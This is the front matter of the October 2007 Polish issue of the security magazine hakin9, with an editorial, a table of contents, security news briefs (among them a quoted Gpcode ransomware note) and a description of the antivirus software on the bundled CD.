Narzędzia. Początki. Atak. hakin9

Transkrypt

1

2

3

4 hakin9 Witam! Terminy haker, cracker kojarzą się zwykłym ludziom raczej z pojęciem cyberprzestępcy, jednak bardziej wtajemniczeni wiedzą, że te dwa typy różnią się od siebie. Jak zapewne Państwo wiedzą, hakerzy to osoby, które szukają luk w oprogramowaniu komputerowym, a później wykorzystują taką wiedzę, aby uzyskać dostęp do zabezpieczonych zasobów. Natomiast cracker to osoba zajmująca się łamaniem zabezpieczeń komputerowych. Hakerzy, skupieni w społeczności hakerskiej, używają terminu cracker dla odróżnienia się od przestępców; z kolei crackerzy terminu haker używają na określenie włamywaczy sieciowych. Obie wspomniane grupy ludzi działają z różnych pobudek. Jedni włamują się do serwisów komputerowych, aby wykryć luki, a potem szantażują właścicieli portali. A drudzy pracują teraz dla firm takich jak TrendMicro i pomagają im stworzyć szczepionki przeciwko nowym zagrożeniom, jakie stawia przed nami Sieć. Motywem działań hakerów i crackerów jest także chęć pozyskania rozgłosu i wywołania ogólnego chaosu. Istnieje swoisty podział hakerów pod względem etyki: black hat (hakerzy działający na pograniczu lub poza granicami prawa), white hat (hakerzy działający w imię prawa, nie chcący popełnić szkód), grey hat (grupa znajdująca się pomiędzy dwiema omawianymi wyżej kategoriami). My, jako Redakcja, mamy do czynienia ze wszystkimi omawianymi grupami hakerów, jednak cenimy tych z grupy white hat. Nasi Czytelnicy bardzo dobrze zdają sobie z tego sprawę. Mieliśmy wiele ciekawych artykułów poświęconych wykrywaniu luk w takich portalach, jak Allegro, Onet czy mbank. Umieszczaliśmy je w celu tylko i wyłącznie informacyjnym, aby uczulić omawiane serwisy na opisane zagrożenia. Mam nadzieję, że zamieszczane przez nas artykuły pomogły już niejednemu Czytelnikowi, dlatego chciałam gorąco polecić artykuł Bartosza Kalinowskiego Obroń swój komputer przed hakerem!!! Bartek w swoim tekście pokazuje przeróżne zachowania systemu świadczące o obecności hakera. Godnym przeczytania artykułem jest pozycja kilku autorów pt. Luki w Voip. W październikowym hakin9 przedstawiamy wywiad z bardzo interesującym człowiekiem, jakim jest komisarz Zbigniew Urbański. Z rozmowy nasi Czytelnicy dowiedzą się co nieco o samym bohaterze, a także o piractwie komputerowym widzianym okiem policjanta i organów ścigania. W numerze, który mają Państwo w rękach, jak zwykle nie zabraknie wielu ciekawych programów, na CD znajdują się m. in. G DATA Antivirus, F-Secure Internet Security oraz dwa nowe tutoriale. Życzę przyjemnej lektury! Katarzyna Juszczyńska W skrócie 6 Mateusz Stępień Przedstawiamy garść najciekawszych wiadomości ze świata bezpieczeństwa systemów informatycznych i nie tylko. Zawartość CD 10 Prezentujemy zawartość i sposób działania najnowszej wersji naszej sztandarowej dystrybucji hakin9.live Narzędzia Recenzja MindMap 5 Professional 12 Recenzja Directory Opus 9 13 Początki Ataki SQL Injection w praktyce 14 Dawid Gołuński Dawid w swoim artykule mówi na czym polegają ataki SQL Injection oraz jakie niosą zagrożenia. Pokaże krok po kroku techniki używane podczas ataku oraz metody obrony. Atak Luki w VoIP 26 Tomasz Piotrowski, Szczepan Wójcik, Mikołaj Wiśniewski, Wojciech Mazurczyk Autorzy przedstawią w jaki sposób zabezpieczyć systemy VoIP, na co zwracać uwagę przy kupowaniu i wdrażaniu tych systemów oraz jakie luki bezpieczeństwa znajdują się w systemie Asterisk. Atak hakera na Twój komputer 36 Bartosz Kalinowski Bartek w swoim artykule scharakteryzuje system, w którym można dostrzec obecność intruza i jakie zostawia po sobie ślady. Łamanie klucza rejestracji Windows XP 48 Rafał Podsiadły Rafał opisał w swoim artykule jak zaczyna życie najpopularniejszy system operacyjny. 4 hakin9 Nr 10/2007

5 Obrona Opera mechanizmy ochrony przed oszustwami 56 Marcin Kopeć Marcin w swoim tekście przedstawia w jaki sposób działa mechanizm ochrony przed oszustwami zaimplementowanymi w przeglądarce internetowej Opera. Konfiguracja serwera ISS dla ASP.NET z protokołem SSL 62 Sławomir Orłowski, Jacek Matulewski Sławek i Jacek przybliżą Czytelnikom temat konfiguracji serwera ISS do obsługi stron ASP.NET z uwierzytelnieniem SSL. Bezpieczna firma Audyt systemów informatycznych 68 Wojciech Malec Wojtek postara się wyjaśnić termin audytu informatycznego oraz przedstawi najważniejsze organizacje zawodowe właściwe dla audytu informatycznego. Księgozbiór 72 Recenzujemy książki: Kryptografia w Javie. Od podstaw oraz Apache. Zabezpieczenia aplikacji i serwerów WWW. Wywiad Wywiad z komisarzem Zbigniewem Urbańskim 74 Katarzyna Juszczyńska, Robert Gontarski Komisarz Zbigniew Urbański ekspert do spraw przestępczości komputerowej. Klub Techniczny Trend Micro dla MSP 77 Felieton Druga strona medalu 78 Patryk Krawaczyński Zapowiedzi 82 Zapowiedzi artykułów, które znajdą się w następnym wydaniu naszego pisma. jest wydawany przez Software Wydawnictwo Sp. z o.o. Dyrektor: Sylwia Pogroszewska Redaktor naczelna: Martyna Żaczek martyna.zaczek@software.com.pl Redaktorzy prowadzący: Katarzyna Juszczyńska katarzyna.juszczynska@software.com.pl Robert Gontarski robert.gontarski@software.com.pl Wyróżnieni betatesterzy: Przemysław Prytek, Paweł Lisowski Opracowanie CD: Rafał Kwaśny Kierownik produkcji: Marta Kurpiewska marta@software.com.pl Skład i łamanie: Artur Wieczorek arturw@software.com.pl Okładka: Agnieszka Marchocka Dział reklamy: adv@software.com.pl Prenumerata: Marzena Dmowska pren@software.com.pl Adres korespondencyjny: Software Wydawnictwo Sp. z o.o., ul. Bokserska 1, Warszawa, Polska Tel , Fax Osoby zainteresowane współpracą prosimy o kontakt: cooperation@software.com.pl Jeżeli jesteś zainteresowany zakupem licencji na wydawanie naszych pism prosimy o kontakt: Monika Nowicka monika.nowicka@software.com.pl tel.: +48 (22) fax: +48 (22) Druk: 101 Studio, Firma Tęgi Redakcja dokłada wszelkich starań, by publikowane w piśmie i na towarzyszących mu nośnikach informacje i programy były poprawne, jednakże nie bierze odpowiedzialności za efekty wykorzystania ich; nie gwarantuje także poprawnego działania programów shareware, freeware i public domain. Uszkodzone podczas wysyłki płyty wymienia redakcja. Wszystkie znaki firmowe zawarte w piśmie są własnością odpowiednich firm i zostały użyte wyłącznie w celach informacyjnych. Do tworzenia wykresów i diagramów wykorzystano program firmy Płytę CD dołączoną do magazynu przetestowano programem AntiVirenKit firmy G DATA Software Sp. z o.o. Redakcja używa systemu automatycznego składu UWAGA! Sprzedaż aktualnych lub archiwalnych numerów pisma w cenie innej niż wydrukowana na okładce bez zgody wydawcy jest działaniem na jego szkodę i skutkuje odpowiedzialnością sądową. hakin9 ukazuje się w następujących krajach: Hiszpanii, Argentynie, Portugalii, Francji, Belgii, Luksemburgu, Kanadzie, Maroko, Niemczech, Austrii, Szwajcarii, Polsce, Czechach, Słowacji. Prowadzimy również sprzedaż kioskową w innych krajach europejskich. Magazyn hakin9 wydawany jest w 7 wersjach językowych: PL ES CZ EN IT FR DE Nakład wersji polskiej egz. UWAGA! Techniki prezentowane w artykułach mogą być używane jedynie we własnych sieciach lokalnych. Redakcja nie ponosi odpowiedzialności za niewłaściwe użycie prezentowanych technik ani spowodowaną tym utratę danych. hakin9 Nr 2/2006 5

6 W skrócie Błąd w Xvid W popularnym zestawie kodeków wideo Xvid wykryto lukę, która umożliwia atakującemu całkowite przejęcie kontroli nad atakowanym komputerem. Gdy użytkownik komputera uruchomi odpowiednio spreparowany plik.avi dochodzi do ataku za pomocą aplikacji, która odwołuje się do programu Xvid. Błąd występuje w pliku mbcoding.c w funkcjach get_intra_ block, get_inter_block_h263 oraz get_inter_block_mpeg. Podatne są na niego zarówno aplikacje dla systemu Windows, jak i Linux. Xvid to kodek obrazu zgodny z ISO MPEG-4, wydany na licencji GNU GPL. Jego nazwa jest celowym anagramem nazwy kodeka DivX, który jest zamkniętą implementacją tego samego standardu. Haker odcina dostęp do kont owych na UK2.net... Domena internetowa UK2.net stała się celem ataku hakera, pozostawiając tym samym internautów czasowo odciętych od dostępu do i. Internauci pojawiający się na stronie 12 lipca ujrzeli przeobrażoną witrynę. Najwidoczniej była to sprawka islamskiego hakera. Wiele osób zwróciło się do nas w tej sprawie z informacjami, że nie są w stanie wejść na swoje konta mówią pracownicy portalu. Doświadczenia czytelnika Andy ego są typowe: UK2 była (dla mnie) nieosiągalna od godziny 6:00 tego ranka, gdy nie działał przez POP3. Próbowałem jeszcze raz o 12 w południe za pomocą POP3 i strony internetowej, ale bez rezultatu, oba nie działały jedyne co mogły mi zaoferować to zmienioną stronkę. Wcześniej też miałem dużo problemów z UK2. Moje konta były niestabilne przez 3 tygodnie pod koniec maja i na początku czerwca. Czasami działało, ale zazwyczaj odmawiało posłuszeństwa. Firma oficjalnie ogłosiła, że w godzinach porannych we czwartek stała się ofiarą ataku hakerskiego. Atak uniemożliwił internautom wejście na stronę UK2 i na skrzynkę ową. UK.net na swoich stronach napisał, że ta kwestia została już rozwiązana przez specjalistów. Pomimo tego, jak dodali, niektórzy użytkownicy mogli mieć problemy z dostępem do serwisu, dopóki DNS nie naniesie zmian. Kaspersky Anti-Virus na liście 100 najlepszych produktów IT 2007 Kaspersky Lab, producent rozwiązań służących do ochrony danych, informuje o otrzymaniu wyjątkowego wyróżnienia: program Kaspersky Anti-Virus 6.0 znalazł się na liście 100 najlepszych produktów IT 2007 opublikowanej przez PC World. Amerykański magazyn PC World kolejny raz już w okresie wakacyjnym opublikował listę 100 najlepszych, najnowocześniejszych oraz najbardziej docenionych przez konsumentów produktów z branży informatycznej i internetowej. Zestawienie obejmuje wiele różnorodnych produktów (sprzęt, oprogramowanie, serwisy oraz usługi internetowe). Na 55 miejscu listy, jako jedyny komercyjny program antywirusowy uwzględniony w zestawieniu, znalazł się Kaspersky Anti-Virus. Pełna lista dostępna jest pod adresem: ticle/ id, page,13 /ar ticle.html Kaspersky Anti-Virus to program Fake stron Apple antywirusowy firmy Kaspersky Lab, zapewniający ochronę przed zagrożeniami płynącymi z sieci Internet (wirusy, robaki, konie trojańskie, adware, spyware). Kaspersky Anti-Virus współpracuje z systemami Windows 98/Me/XP, NT Workstation oraz Windows 2000 Professional. Specjaliści z Sunbelt odkryli nowego trojana, który próbuje wyciągać pieniądze od użytkowników poprzez fikcyjną sprzedaż najnowszego dziecka koncernu Apple, iphone. Eksperci z Sunbelt twierdzą, że trojan mógł powstać na zamówienie przestępców, a w dodatku jest słabo wykrywalny przez aplikacje antywirusowe. Podczas odwiedzin google.com lub yahoo.com wirus pokazuje na ekranie okienka popup, które zawierają między innymi informację: supported by Google oraz supported by Yahoo. Kliknięcie w reklamę w zainfekowanym systemie kończy się przekierowaniem na specjalnie przygotowaną wersję strony, gdzie internauta może wypełnić formularz zamówienia i dokonać przelewu gdzieś do banku na Łotwie zamiast na konta Apple. iphone to urządzenie posiadające funkcje telefonu komórkowego, odtwarzacza MP3 (ipod) i komunikatora internetowego, jak nazwała tę funkcję Apple Inc. Nowatorskim rozwiązaniem w urządzeniu była rezygnacja z jakiejkolwiek klawiatury zamiast tego iphone posiada ekran dotykowy, przy którym użyto technologię o nazwie Multi-Touch: zamiast korzystać z rysika, wszystko wciska się jednym lub kilkoma palcami dłoni. iphone działa na zoptymalizowanej wersji Mac OS X. System zajmuje około 700 MB. Bateria w iphonie nie powinna być wymieniana przez użytkownika. Według producenta, czas pracy baterii to: do 24 godzin słuchania muzyki, do 8 godzin rozmowy, do 7 godzin oglądania filmów, do 6 godzin przeglądania Internetu, bądź do 250 godzin czuwania, jednak czas ten zależy od różnych ustawień. 6 hakin9 Nr 10/2007

7 Mateusz Stępień Początek ery petaflopsowych komputerów Elektroniczny gigant IBM zaprezentował najszybszy komputer świata Blue Gene/P. który jest sto tysięcy razy szybszy niż przeciętny komputer biurowy. Prędkość superkomputera to mniej więcej jeden petaflop (1 petaflop = 1,000 teraflopów = 1,000,000 gigaflopów), czyli tysiąc bilionów operacji na sekundę. Taką sprawność zapewnia rdzeni procesora IBM PowerPC 450, z których każdy jest taktowany zegarem o częstotliwości 850 MHz. Cztery rdzenie tworzą jeden procesor. System operacyjny superkomputera bazuje na Linuksie, a aplikacje można tworzyć w standardowych językach programowania, takich jak Fortran, C czy C++. Za pierwszy superkomputer uznaje się CDC Wirus szantażysta 6600, który powstał w 1963 roku według projektu i pod ścisłym nadzorem Seymoura Craya. Maszyna wykonywała 3 miliony operacji na sekundę. Był to pierwszy komputer, w którym zastosowano tranzystory krzemowe oraz nowatorską technikę chłodzenia podzespołów freonem. Najpotężniejszą maszyną w Polsce jest klaster HOLK. Komputer, znajdujący się w Centrum Informatycznym Trójmiejskiej Akademickiej Sieci Komputerowej, został zbudowany w 2003 roku i wówczas znajdował się na 231 pozycji TOP500. Maszyna zarządzana przez system GNU/Linux (dystrybucja Debian), której teoretyczna moc obliczeniowa sięga 1.5 TFLOPS, jest wykorzystywana do obliczeń naukowych. Specjaliści z Kaspersky Lab wykryli nową odmianę wirusa Gpcode, który szyfruje pliki na dyskach ofiar i żąda okupu w wysokości 300 dolarów za przywrócenie do nich dostępu. Robak Virus.Win32.Gpcode do szyfrowania plików wykorzystuje złożony algorytm informując że jest to RSA-4096, co nie jest prawdą, bo jak ustalili eksperci z Kaspersky Lab jest to algorytm RC4. Autorami wirusa najprawdopodobniej są Rosjanie. Na zaatakowanym komputerze wirus umieszcza również plik o nazwie read_me.txt, w którym umieszczona jest taka oto informacja: Hello, your files are encrypted with RSA-4096 algorithm ( en.wikipedia.org/wiki/rsa). You will need at least few years to decrypt these files without our software. All your private information for last 3 months were collected and sent to us. To decrypt your files you need to buy our software. The price is $300. To buy our software please contact us at: xxxxxxx@xxxxx.com and provide us your personal code -xxxxxxxxx. After successful purchase we will send your decrypting tool, and your private information will be deleted from our system. If you will not contact us until 07/15/2007 your private information will be shared and you will lost all your data. Glamorous team. Witaj, twoje pliki zostały zaszyfrowane przy użyciu algorytmu RSA-4096 ( wiki/rsa). Bez naszego oprogramowania odszyfrowanie tych plików zajmie ci przynajmniej kilka lat. Od trzech miesięcy twoje poufne informacje były gromadzone i wysyłane do nas. Aby odszyfrować swoje dane, musisz kupić nasze oprogramowanie. Jego cena to $300. W celu dokonania zakupu skontaktuj się z nami pod adresem xxxxxxx@xxxxx.com i załącz swój osobisty kod - xxxxxxxxx. Po dokonaniu zakupu, prześlemy ci narzędzie deszyfrujące a twoje poufne informacje zostaną skasowane z naszego systemu. Jeżeli nie skontaktujesz się z nami do 15 lipca 2007 twoje poufne informacje zostaną udostępnione w Internecie. Glamorous team. iphone częściowo złamany Jon Lech Johansen, czyli sławny DVD Jon, złamał część zabezpieczeń nowego iphone a. Ujawnił sposób aktywacji nowego telefonu firmy Apple bez potrzeby wiązania się umową z jedynym w Stanach Zjednoczonych autoryzowanym dostawcą AT&T. Jon napisał specjalny program, który imituje zachowanie serwera odpowiadającego za aktywację urządzeń przez firmę Apple. Kompletną instrukcję przeprowadzenia procesu aktywacji i kod źródłowy programu zastępującego serwer aktywujący telefony można znaleźć w blogu DVD Jona. Jon Lech Johansen jest norweskim programistą zaangażowanym w rozkodowywanie systemów zabezpieczeń. Jego ojciec jest Norwegiem, a matka Polką. Uczestniczył w stworzeniu programu deszyfrującego zakodowane filmy DVD DeCSS. Jon stworzył także zestaw otwartych sterowników do odtwarzacza MP3 Jaz- Piper (OpenJaz, 2001) i program QTFairUse do odczytywania zakodowanych strumieni AAC (2003). W 2004 r. dołączył do zespołu programistów VideoLAN, dla którego opracował wtyczkę do odtwarzania mediów zabezpieczonych systemem FairPlay oraz sposób odtwarzania materiałów zakodowanych w WMV9. Zdołał też ominąć zabezpieczenia protokołu AirPort Express firmy Apple i algorytmu ochrony plików NSC z Windows Media Playera. hakin9 Nr 10/2007 7

8 W skrócie IE7 podatny na spoofing Firma Secunia poinformowała o wykrytej przez Michała Zalewskiego luce w przeglądarce Microsoftu Internet Exlporer 7. Błąd występuje w metodzie document.open() i pozwala na sfałszowanie źródłowego adresu IP nawet w przypadku, gdy ręcznie wpiszemy adres nowej strony. (tzw. spoofing) Michał Zalewski, stwierdził: lukę można wykorzystać tylko wówczas, gdy jest uruchomiony JavaScript. Do tej pory Microsoft nie przygotował łatki na ten błąd, ewentualnego występowania luki nie sprawdzano w przeglądarce Internet Explorer 6. Internet Explorer w wersji Windows, rozwijany jest na bazie kodu Mosaic zakupionego od firmy Spyglass. Program został oficjalnie zaprezentowany 23 sierpnia 1995 roku. Najważniejsze nowości w wersji IE 7: przeglądanie stron w kartach, narzędzia wykorzystujące RSS i Atom, obsługa przezroczystych grafik PNG, ulepszona architektura, mająca lepiej chronić przed wirusami i robakami. Włamanie na brytyjski serwis firmy Microsoft Wykryto podatność na atak typu SQL Injection na brytyjskiej stronie Microsoftu. Dziura umożliwiała m. in. wyciągnięcie listy użytkowników i ich zakodowanych haseł, a także modyfikowanie tabel. Podatność na atak wykryto na stronie przeznaczonej dla partnerów. Haker z Arabii Saudyjskiej ukrywający się pod pseudonimem remoter umieścił w Internecie nagranie z włamania, które niestety jest już niedostępne. Po bardziej wnikliwej analizie wykazano, że serwis jest również podatny na atak typu Cross Site Scripting. Atak typu SQL Injection polega na takiej manipulacji aplikacją komunikującą się z bazą danych, aby ta umożliwiła atakującemu uzyskanie dostępu lub modyfikację danych, do których nie posiada on uprawnień. W praktyce polega to na wykorzystaniu interfejsu użytkownika (adresu URL, formularza HTML/XML, okna dialogowego itp.) do wprowadzenia do aplikacji spreparowanego ciągu znaków. Gadający koń trojański Sieci odkryto nowego niezwykle groźnego i złośliwego W konia trojańskiego o nazwie BotVoice.A. Szkodnik jest o tyle nietypowy, że po przeniknięciu do systemu niszczy dane znajdujące się na dysku twardym i informuje werbalnie użytkownika o szkodach, które spowodował (wykorzystując w tym celu wbudowany do Windows syntezator mowy): Zostałeś zarażony. Powtarzam, zostałeś zarażony, a twoje pliki systemowe zostały skasowane. Przykro mi. Miłego dnia i do widzenia. (You have been infected I repeat you have been infected and your system files have been deleted. Sorry. Have a nice day and bye bye). BotVoice.A potrafi m. in. zablokować dostęp do plików BAT, COM, EXE, MP3 oraz do Menedżera Zadań i Edytora Rejestru. Szkodliwy kod atakuje systemy Windows 95 i nowsze. Nie zagraża natomiast Windows Vista. Trojan nie potrafi samodzielnie zainfekować komputera, konieczna jest interakcja ze strony użytkownika. Rozprzestrzenia się głównie za pośrednictwem wymiennych nośników danych lub sieci komputerowych. BotVoice.A wykryty został przez specjalistów z firmy Panda Software. BotVoice.A został stworzony tylko po to, by niszczyć od lat nie widziałem tak doskonałego przykładu bezmyślnego wandalizmu komentuje Roger Thompson, specjalista z firmy Exploit Prevention Labs. Kolejnych 7 polskich studentów na praktykach w Redmond Microsoft poinformował, że siedmiu studentów z polskich uczelni technicznych będzie reprezentować nasz kraj podczas tegorocznej edycji praktyk, które co roku odbywają się w centrali firmy Microsoft Corporation w Redmond. Do tegorocznej edycji EMEA Internship Program polskie uczelnie zgłosiły 129 kandydatów, z których wybrano siedmiu uczestników. Jeden z nich weźmie udział w programie po raz drugi. Rozmowy z kandydatami po raz kolejny odbyły się w Warszawie. Jest to rezultat wysokiego poziomu reprezentowanego przez studentów pochodzących z Polski, a co za tym idzie, dużej liczby potencjalnych praktykantów. Praktyki prowadzone przez Microsoft w centrali w Redmond pozwalają studentom na udział w rzeczywistych projektach prowadzonych w korporacji, często kluczowych dla firmy oraz ważnych dla branży IT. Udział w programie to dla większości uczestników także pierwszy krok do zdobycia zatrudnienia w firmie Microsoft. Po zakończeniu stażu studenci mają rok na skończenie studiów oraz powrót do Redmond. Do tegorocznej edycji EMEA Internship Program zakwalifikowali się z Polski: Sylwia Kopczyńska, Piotr Kułaga, Łukasz Tomczyk, Paweł Baszuro, Piotr Findeisen, Mike Kaczmarczyk oraz Szymon Wasik z Politechniki Poznańskiej, Wyższej Szkoły Informatyki Stosowanej i Zarządzania w Warszawie, Politechniki Częstochowskiej, Wyższej Informatycznej Szkoły Zawodowej w Gorzowie Wielkopolskim oraz Uniwersytetu Warszawskiego. Udział w programie EMEA Internship Microsoftu jest dla mnie doskonałą okazją do zdobycia doświadczenia w międzynarodowej korporacji. Wyjazd ten pozwoli mi zobaczyć, jak wygląda praca w zespole zajmującym się dużymi projektami informatycznymi, a w przyszłości mam nadzieję ułatwi mi również zdobycie ciekawego i pełnego wyzwań zatrudnienia. Jestem przekonany, że pobyt w kampusie Microsoft w Redmond będzie jednocześnie okazją do dobrej zabawy i poznania ciekawych ludzi z całego świata powiedział Piotr Kułaga, student Wyższej Szkoły Informatyki Stosowanej i Zarządzania w Warszawie. 8 hakin9 Nr 10/2007

9 Mateusz Stępień Dziurawy Adobe Flash Player i Photoshop Atak na Pentagon Hakerzy przeprowadzili skuteczny atak na systemy komputerowe amerykańskiego ministerstwa obrony. Pentagon został zmuszony do wyłączenia części swojego systemu pocztowego, przez co prawie półtora tysiąca pracowników straciło dostęp do swoich kont owych. Zdecydowaliśmy się na wyłączenie części systemu pocztowego OSD w związku z wykryciem włamania do naszej infrastruktury. Nasi specjaliści wykonali wszelkie niezbędne działania dotyczące zabezpieczenia systemu oraz śladów włamania spodziewam się, że wszystkie systemy wrócą online już wkrótce mówił na konferencji prasowej Robert Gates, rzecznik prasowy Pentagonu. Przedstawiciele Departamentu Obrony nie Producent oprogramowania multimedialnego, firma Adobe Systems wydała poprawki dla swoich aplikacji: Flash Playera i Photoshopa (CS2/CS3). Poprawki te naprawiają usterki bezpieczeństwa, których potencjalny intruz może użyć do wykonania dowolnego kodu. W Adobe Flash Player wykryto luki, które m. in. umożliwiają napastnikowi zdalne przejęcie pełnej kontroli nad systemem. Podatności występują w aplikacjach: Adobe Flash Player w wersji i wcześniejszych, Adobe Flash Player w wersji i wcześniejszych, Adobe Flash Player w wersji i wcześniejszych. Zaktualizowana wersja Flash Playera jest dostępna (podobnie jak łatki dla wcześniejszych wydań odtwarzacza) pod adresem: W oprogramowaniu Photoshop CS2 i CS3 wykryto błąd, który pozwala na wstrzyknięcie i uruchomienie dowolnego kodu. Istotą tego błędu jest niepoprawne przetwarzanie plików zapisanych w formatach PNG, DIB, RLE i BMP. Błąd w Photoshopie wykrył specjalista ukrywający się pod pseudonimem Marsu. Adobe Systems to amerykańska firma z siedzibą w San José w Kalifornii, znana z projektowania szeroko rozumianego oprogramowania graficznego dla systemów Mac OS i Windows. Przedsiębiorstwo założyli w 1982 r. byli pracownicy Xerox PARC, John Warnock i Charles Geschke. Najważniejsze produkty firmy to: Adobe Acrobat, Adobe After Effects, Adobe Illustrator, Adobe InDesign, Adobe Photoshop, Adobe Premiere, Adobe Reader. ujawnili żadnych innych informacji na temat włamania potwierdzili jedynie: Atak ten nie miał właściwie żadnego wpływu na nasze działania napastnik nie uzyskał dostępu do żadnych tajnych informacji. Nasza infrastruktura informatyczna jest wciąż atakowana, mamy więc doświadczenie w postępowaniu w takich sytuacjach. Ruszyła internetowa aukcja exploitów Jedna z firm szwajcarskich uruchomiła stronę aukcyjną, na której wystawiane na sprzedaż będą informacje o nowych lukach w oprogramowaniu. Witryna nosi nazwę WabiSabiLabi i jej głównym celem jest nakłonienie specjalistów, którzy znaleźli luki, by sprzedawali je firmom zainteresowanym w ich załataniu, a nie cyberprzestępcom. Zdecydowaliśmy się na uruchomienie serwisu umożliwiającego sprzedawanie wyników badań nad bezpieczeństwem, ponieważ wielu specjalistów odkrywa luki, ale niewielu z nich informuje o tym odpowiednich ludzi. Naszym celem jest umożliwienie im uzyskania uczciwej ceny za pracę i jednoczesne zapewnienie, że nie będą musieli oddawać jej wyników za darmo ani sprzedawać cyberprzestępcom mówi Herman Zampariolo, szef firmy. Pomysł szwajcarskiej firmy ma zarówno zwolenników, jak i przeciwników. Do krytykantów należy Gunter Ollman, dyrektor IBM Internet Security Systems: To przypomina witryny, które istnieją na czarnym rynku. Będziemy mieli do czynienia z tymi samymi ludźmi, którzy szukają dziur, by je sprzedać. To dla nich po prostu dodatkowy kanał dystrybucji. Korzystanie z serwisu będzie darmowe przez sześć miesięcy, potem będą pobierane opłaty w wysokości 10% kwoty sprzedaży. Nowa odmiana virusa Gpcode W Sieci pojawiła się nowa odmiana wirusa Gpcode, która to po zarażeniu komputera użytkownika szyfruje pliki na dyskach. Wirus za odszyfrowanie domaga się zapłaty 300 dolarów i informuje, że używa algorytmu szyfrującego RSA-4096, co nie jest prawdą. Na dysku pojawia się także plik tekstowy read_me.txt w którym możemy przeczytać Hello, your files are encrypted with RSA-4096 algorithm ( You will need at least few years to decrypt these files without our software. All your private information for last 3 months were collected and sent to us. To decrypt your files you need to buy our software. The price is $300 (...) Specjaliści z firmy Kaspersky po analizach doszli do tego, że wykorzystywany jest tu algorytm RC4. Najnowsze oprogramowanie firmy Kaspersky już radzi sobie z wirusem i odszyfrowuje pliki. Najprawdopodobniej autorami wirusa są Rosjanie. hakin9 Nr 10/2007 9

10 hakin9.live Zawartość CD Na dołączonej do pisma płycie znajduje się hakin9.live (h9l) w wersji on BackTrack2.0, zawierająca przydatne narzędzia, dokumentację, tutoriale i materiały dodatkowe do artykłów. Aby zacząć pracę z hakin9.live, wystarczy uruchomić komputer z CD. Po uruchomieniu systemu możemy zalogować sie jako użytkownik hakin9 bez podawania hasła. Materiały dodatkowe Tutorial podstawy języka Python, Tutorial wstęp do free Pascal. Programy: G DATA AntiVirus 2007, F-secure Internet Security 2007, AVG Anty-Rootkit, AVG Antywirus 7.5, CureIT. G DATA AntiVirus 2007 Aktywacja od 5 października. G DATA AntiVirus 2007 umacnia wiodącą pozycję w czołówce programów antywirusowych w dziedzinie wykrywalności wirusów. Dzięki zoptymalizowanej technologii podwójnego skanowania połączonej z mechanizmem OutbreakShield, nowy antywirus wykrywa wirusy jeszcze dokładniej i szybciej, zużywając jednocześnie znacznie mniej zasobów systemowych. G DATA AntiVirus 2007 usuwa złośliwe oprogramowanie typu spyware, adware, riskware, a także wirusy, trojany, robaki. Gwarantuje jeszcze skuteczniejszą ochronę przed hakerami. Program przeznaczony dla użytkowników wymagających, potrzebujących prostej i szybkiej ochrony komputera. Dzięki zastosowaniu dwóch silników skanujących oraz trzech skanerów poczty Twoje dane są w 100% bezpieczne. To jednak początek długiej listy zalet, docenianych przez specjalistów na całym świecie. F-secure Internet Security 2007 Zestaw zabezpieczeń przeznaczony dla użytkowników domowych i małych firm. W skład pakietu wchodzą następujące moduły, takie jak: ochrona antywirusowa, antispyware, firewall, ochrona poczty, antispam, ochrona przed intruzami IDS oraz moduły kontroli rodzicielskiej i kontroli aplikacji. Narzędzie chroni system poza standardowymi wirusami i robakami także przed oprogramowaniem szpiegującym i rootkitami, co zapewnia pełną ochronę komputera. W wersji 2007 Internet Security posiada swoiste laboratorium wykrywania wirusów, wykorzystując technologię DeepGuard. AVG Anti-Rootkit AVG Anti-Rootkit jest silnym narzędziem z technologią state-of-art do wykrywania i usuwania rootkit'ów. Rootkit'y służą do ukrywania złośliwych objektów na komputerze takich jak trojany czy keyloggery. Jeżeli włamywacz wykorzystuje technologię rootkit do tego, aby ukryć swoją obecność, wtedy bardzo ciężko jest znaleźć złośliwe oprogramowanie na komputerze. AVG Anti-Rootkit daje Ci możliwość znalezienia i usunięcia rootkita oraz zdemaskowania złodzieja, którego ukrywa rootkit. Interface jest przejrzysty i łatwy w obsłudze. Oprogramowanie zapewnia szybkie i efektywne wykrywanie nawet obiektów NTFS-ADS AVG Antywirus 7.5 Najnowsze wydanie narzędzia przeciwko wirusom firmy Grisoft do użytku domowego na pojedyńczym komputerze. Zapewnia najwyższy poziom wykrywalności dlatego miliony użytkowników na świecie powierzyło bezpieczeństwo swoich komputerów właśnie temu produktowi. Poruszanie się po oprogramowaniu jest intuicyjne i proste, samo narzędzie nie potrzebuje dużych zasobów komputera i nie zwalnia jego pracy. AVG Anti-Virus umożliwia przeprowadzanie automatycznych aktualizacji, oraz zapewnia ochrone w czasie rzeczywistym poprzez nadzorowanie dzialających programów czy otwieranych plików. CureIT Jest to darmowy anti-virus i anti-spyware bazujący na silniku skanera Dr.Web Anti-virus, który pomoże Ci szybko przeskanować i wyleczyć komputer jeśli będzie to konieczne. Obsługuje stacje robocze wykorzystujące takie systemy operacyjne jak MS Windows 95OSR2/ 98/Me/ NT 4.0/2000/XP/2003Vista. Interface skanera jest przystosowywany odpowiednio do wykrytego języka na danym komputerze, jeżeli lokalny język nie zostanie wykryty domyślnie ustawiany jest angielski. Narzędzie zawiera aktualną bazę antywirusów na czas pobrania, a aktualizacje są przeprowadzane, aż dwa razy na godzinę. Aby korzystać z najświeższej bazy wirusów należy ściągnąć ostatnia wersję Dr. Web CureIt, ponieważ narzędzie nie zawiera bezpośredniej aktualizacji. Serdeczne podziękowania dla firmy TTS Company za udostępnienie programu EagleEyeOS Professional Severe w numerze hakin9 8/ hakin9 Nr 10/2007

11 Jeśli nie możesz odczytać zawartości płyty CD, a nie jest ona uszkodzona mechanicznie, sprawdź ją na co najmniej dwóch napędach CD. W razie problemów z płytą, proszę napisać pod adres: cd@software.com.pl

